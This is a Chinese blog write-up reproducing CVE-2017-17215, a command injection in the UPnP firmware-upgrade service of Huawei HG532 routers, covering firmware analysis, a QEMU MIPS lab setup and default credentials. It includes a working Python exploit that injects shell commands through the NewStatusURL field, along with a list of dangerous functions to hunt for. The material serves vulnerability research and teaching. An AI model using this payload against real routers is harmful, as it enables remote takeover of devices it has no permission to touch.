华为路由器CVE-2017-17215-HG532

已于 2022-01-22 20:38:51 修改
阅读量5.8k 收藏 1
点赞数
分类专栏: IOT 漏洞复现 文章标签: 安全 iot 安全漏洞
于 2022-01-22 20:38:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41667409/article/details/122643152
版权

漏洞描述

官方

在这里插入图片描述

该远程命令执行漏洞是位于UPnP服务中的,该设备支持名为DeviceUpgrade的一种服务类型
设备可以通过这种服务更新固件,具体过程是向“/ctrlt/DeviceUpgrade_1”这个地址提交请求,请求中包含NewStatusURL及NewDownloadURL两个元素。远程管理员可以通过该漏洞在设备上执行任意命令 将shell元字符 注入NewStatusURL以及NewDownloadURL元素中。

分析漏洞

下载固件:

https://ia601506.us.archive.org/22/items/RouterHG532e/router%20HG532e.rar

解压分析固件

在这里插入图片描述

上述简介中讲过,这个漏洞集中在UPnP服务中,所以拖到IDA进行分析

查找相关敏感的字符串

在这里插入图片描述

交叉引用跟进去查看

在这里插入图片描述

发现和TOTOLink相似的漏洞点:在没有任何过滤的情况下,snprintf拼接好直接执行

在这里插入图片描述

大概流程就是程序通过ATP_XML_GetChildNodeByName函数获取xml中的节点,并且未经过检查就直接与upg -g -U %s -t ‘1 Firmware Upgrade Image’ -c upnp -r %s -d -b拼接,然后使用system函数进行执行。

下面搭建环境利用

搭建环境

下载启动虚拟机需要的镜像:上面说过,mips,32位,大端

镜像:

https://people.debian.org/~aurel32/qemu/mips/debian_squeeze_mips_standard.qcow2
https://people.debian.org/~aurel32/qemu/mips/vmlinux-2.6.32-5-4kc-malta

网络配置:(与docker中bridge模式配置差不多)

创建虚拟网桥:

sudo apt-get install bridge-utils
sudo brctl addbr Virbr0
sudo ifconfig Virbr0 192.168.153.1/24 up

创建tap接口,添加到网桥

sudo tunctl -t tap0
sudo ifconfig tap0 192.168.153.11/24 up
sudo brctl addif Virbr0 tap0

启动虚拟机:

sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic

虚拟机中配置ip

ifconfig eth0 192.168.153.2/24 up

然后将固件中的文件系统拷进去

scp -r squashfs-root/ root@192.168.153.2:~/

在这里插入图片描述

在虚拟机中挂载dev和proc

mount -o bind /dev ./squashfs-root/dev
mount -t proc /proc ./squashfs-root/proc

启动shell

chroot squashfs-root sh

因为后面启动路由器之后,ip会变化,所以另开一个终端启动路由器,这个终端用来后面修改IP地址

ssh root@192.168.153.2
chroot squashfs-root /bin/sh
./bin/upnp
./bin/mic

然后到刚在那个预留的终端中修改IP

ifconfig eth0 192.168.153.2/24 up
ifconfig br0 192.168.153.11/24 up

然后就可以正常使用了;账号密码:admin,@Hua1234

在这里插入图片描述

漏洞利用

根据流程,利用思路大概是:

首先在输入单引号将前面的字符串闭合,然后再注入相应的执行命令即可,如需要执行cat /flag命令,则需要做的就是构造’;cat /flag;节点即可。通过ATP_XML_GetChildNodeByName函数处理后,该节点字符串与upg -g -U %s -t ‘1 Firmware Upgrade Image’ -c upnp -r %s -d -b拼接得到upg -g -U %s -t ‘1 Firmware Upgrade Image’ -c upnp -r ';cat /flag; -d -b,然后执行system调用,实现注入。

利用脚本

import requests
headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

data = '''<?xml version="1.0" ?>
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
   <NewStatusURL>;echo "pmjtest">>/bin/hell/1;</NewStatusURL>
   <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  </u:Upgrade>
 </s:Body>
</s:Envelope>
'''
requests.post('http://192.168.153.2:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

利用效果

在这里插入图片描述

在这里插入图片描述

自动化漏洞挖掘思路

  1. 我觉得第一个关注点就是从输入点进去一个个查,比如TOTOLink中的websGetVar,然后跟进去查看是否有风险点
  2. 第二个就是从危险函数倒追,比如两处都遇到的,sprintf拼接完成之后,直接没有任何处理就使用system函数执行:strcpy、sprintf、system等
‘popen’, ‘system’, ‘doSystemCmd’, ‘doSystembk’, ‘doSystem’, ‘COMMAND’, ‘_popen’, ‘_system’, ‘_doSystemCmd’, ‘_doSystembk’, ‘_doSystem’, ‘_COMMAND’,‘sprintf’, ‘snprintf’, ‘_sprintf’, ‘_snprintf’

这是我的对这两个设备进行漏洞挖掘的思路总结。

  1. 共享关键字,比如上面有setenv和getenv,或者telnet的关键字,找对应关系
    • 识别这些共享关键字,在后端二进制中定位对应的引入点,并开始查找漏洞
    • 这种情况一般手法:ida中字符串,或是在固件中直接grep查找字符串

参考:https://xz.aliyun.com/t/8494

Getting it done.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
华为HG532系列路由器命令注入漏洞复现 CVE-2017-17215
afei001
11-02 1048
华为HG532系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产品。2017年11月27日Check Point团队报告华为HG532产品的远程命令执行漏洞(CVE-2017-17215)。通过认证的攻击者可以向37215端口发送恶意报文进行攻击。成功的利用可能导致远程执行任意代码。据vuldb描述,该漏洞被作为一个非公开的零日漏洞处理了至少85天。
华为HG532e固件升级2016最新版固件B017
08-14
华为HG532e固件升级2016最新版固件B017-- HG532eV100R001C02B017
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 6899
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
华为云鲲鹏安装docker docker-compose 成功亲测
最新发布
ecshop数据采集发布接口,zencart,lightinthebox,shopex 采集,快客
06-09 904
更新弹性云服务器的系统或者软件时,可以连接Internet,通过外部镜像源提供相关服务。但是,如果弹性云服务器无法访问Internet,或者外部镜像源提供的服务不稳定时,可以使用华为云提供的一键配置脚本完成镜像源配置并进行更新。安装好Cron后,编辑/etc/yum/yum-cron.conf文件,将如下选项设为yes既可。由于ARM 架构服务器的特殊,找个靠谱的镜像源不容易,找个能用的教程更不容易。此处不要更换云服务器的镜像源,大多数云服务厂商已经调教好了镜像。(此处全是坑,我已经踩的差不多了)
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3469
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
CVE-2017-17215(华为HG532远程命令执行漏洞)复现问题与解决方案
a5555678744的博客
09-29 1537
环境准备: qemu环境的准备: 可以看freebuf上大佬的博客 通过CVE-2017-17215学习路由器漏洞分析,从入坑到放弃 - FreeBuf网络安全行业门户d 注意事项: 1.最好就用Ubuntu16.04,不要问我为什么知道的,强上Ubuntu20.04留下的只有泪。 2.上面这一步中可能遇到qemu-ifup这个文件本身就存在的问题,建议备份之后删掉重写成博客中那个样子。 3.博客中从eth0切换到eth1的操作好像是必定要做的,但是我遇到了一个严重的问题,q.
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
在2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
华为欧拉系统 EulerOS-V2.0SP5-x86_64-dvd.part4.rar
12-09
华为欧拉系统 EulerOS-V2.0SP5-x86_64-dvd文件分割成 五个 压缩包,必须集齐 五个 文件后才能一起解压一起使用: EulerOS-V2.0SP5-x86_64-dvd.part5.rar ... EulerOS-V2.0SP5-x86_64-dvd.part4.rar ...
HG532eV100R001C01B020_upgrade_packet.bin
08-07
个人用于CVE-2017-17215华为路由器漏洞固件 HG532eV100R001C01B020_upgrade_packet.bin 定制版的华为HG532具有远程执行代码漏洞。 经过身份验证的攻击者可以将恶意数据包发送到端口37215,以发起攻击。 成功的利用...
华为笔试题java-starred:我的GitHub星星的精选列表!
06-03
(CVE-2016-5195) - Parallax Software Corp. 的 Descent (1995) - Dire Wolf 是一个软件“声卡”AX.25 数据包调制解调器/TNC 和 APRS 编码器/解码器。 它可以作为跟踪器、数字中继器、APRStt 网关或 Internet 网关 ...
Linux阻止SSH暴力破解的最好方法
09-29
Linux阻止SSH暴力破解的最好方法 相关
华为HG532E WAN口固件
01-14
华为HG532E WAN口固件,可以用LAN1口改为WAN口,将ADSL MODEM改作路由器使用。
HG532E 固件 V15
04-06
HG532E 固件 V15。 HG532e_固件_V100R001C02B015_中国渠道_05011ENB HG532E
华为路由器 HG532e_固件_V100R001C02B015
04-22
华为HG532e固件,升级后可以用LAN1口改为WAN口,将ADSL MODEM改作路由器使用。亲测可用。(操作:在原有管理界面中点“维护” -> “设备” -> “升级”标签,升级后重新进入管理页<登陆密码还是原来的>,在左侧菜单底部有一个“上行模式切换”按钮,恭喜你,升级成功啦。切换后系统会恢复出厂设置,再次使用默认用户和密码进入<admin/admin>,在“基本配置” -> “WAN连接配置”中设置你能上网的ip地址,网线插LAN1口)
华为HG532e
10-23
用编程器备份下来的,直接刷上去可用。RT63365方案,其他方案不可用。无线密码:TYPPGSKQHC
利用华为云服务器部署Docker
不负好时光
12-26 6846
1. 购买云服务器 这个不赘述,直接去官网购买https://www.huaweicloud.com/ 2.环境准备 以我个人经历为例,我买的是弹性云服务器ECS,买的时候是window 2008 server操作系统,用不惯。 第一步:切换centOS7.5 打开控制台,进入ECS详情 进入如下界面,先关机,再切换操作系统,之后按照步骤执行即可。 配置安全组 登录服务器 a).使用华为...
华为服务器Docker服务172网段不通
yue0052的博客
01-05 1147
华为服务器Docker服务172网段不通
CVE-2020-10882 TP-Link Archer A7(AC1750)路由器RCE
子曰小玖的博客
04-13 2074
TP-Link Archer A7 AC1750是中国普联(TP-Link)公司的一款无线路由器。固件版本为190726中tdpServer服务在未经身份验证情况下,可进行命令注入,但仅可被路由器LAN端的攻击者利用。 CVE编号 CVE-2020-10882 固件更新 A7(US)_V5_200220 本文分析基于:tdpServer守护程序/usr/bin/tdpServe...
TP-LINK路由器任意代码执行漏洞CVE-2017-9466 WR841N V8版本受影响
weixin_34146805的博客
09-01 957
近日,安全公司披露了存在于版本的路由器的个安全漏洞,成功利用漏洞可以使得攻击者在该路由器上执行任意代码。据Senrio的研究人员表示,该型号的路由器的配置服务(configuration service)存在一个逻辑漏洞(CVE-2017-9466),攻击者可以绕过访问限制来重置路由器的验证信息(密码等)。在利用该漏洞获得更高权限后,攻击者可以再次利用一...
熔断与幽灵:网络安全实践指南防范CPU漏洞详解
该指南由全国信息安全标准化技术委员会(TC260)发布,针对2017年发生的重大CPU安全漏洞——熔断(Meltdown,CVE-2017-5754)和幽灵漏洞(Spectre,包括CVE-2017-5715和CVE-2017-5753)进行了深入分析。熔断漏洞源于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值